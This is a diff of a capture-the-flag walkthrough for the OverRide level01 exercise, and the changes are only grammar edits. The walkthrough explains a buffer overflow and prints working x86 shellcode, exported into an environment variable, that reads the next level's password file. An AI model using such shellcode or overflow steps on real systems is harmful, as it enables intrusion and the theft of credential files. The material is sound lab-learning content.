ArthurMatthys/OverRide/level01/walkthrough.md

-Same thing as the bonus0 of rainfall (we got two read so we need to feed 2 arguments directly).
+Same thing as the bonus0 of rainfall (we got two reads so we need to feed 2 arguments directly).
 There is still a small difference, we can overflow the second read but not the first, since the first one is a global variable and the second has a pre-defined max length.

-So first we export our shellcode.
+So, we first export our shellcode.
 This shellcode is different : it doesn't run a shell, but it outputs the content of a file's given path (found here: http://shell-storm.org/shellcode/files/shellcode-73.php) :

 ```bash
 bonus0@RainFall:~$ export SHELLCODE=`python -c 'print("\x90" * 30 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/users/level02/.pass")'`